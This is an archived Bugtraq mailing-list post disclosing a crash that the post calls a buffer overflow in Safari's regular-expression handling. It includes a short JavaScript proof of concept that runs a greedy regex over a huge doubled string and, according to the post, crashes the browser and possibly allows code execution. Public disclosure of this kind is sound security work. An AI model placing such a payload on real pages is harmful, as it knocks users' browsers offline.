[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Apple Safari "match" Buffer Overflow Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Apple Safari "match" Buffer Overflow Vulnerability
From: jbh_cg@xxxxxxxx
Date: 14 Nov 2006 01:08:12 -0000

The following bug was tested on the latest version of Safari on a fully-patched 
Mac OS X 10.4. 

A remote attacker may exploit this issue to crash the application, effectively 
denying service to legitimate users. Successful exploitation could lead to 
remote code execution.

<script>
var reg = /(.)*/;
var z = 'Z';
while (z.length <= 8192) z+=z;
var boum = reg.exec(z);   
</script>

Follow-Ups:
- Re: Apple Safari "match" Buffer Overflow Vulnerability
  - From: J. Oquendo

Prev by Date: BPG Content Management System SQL Injection
Next by Date: Re: [ GLSA 200611-03 ] NVIDIA binary graphics driver: Privilege escalation vulnerability
Previous by thread: BPG Content Management System SQL Injection
Next by thread: Re: Apple Safari "match" Buffer Overflow Vulnerability
Index(es):
- Date
- Thread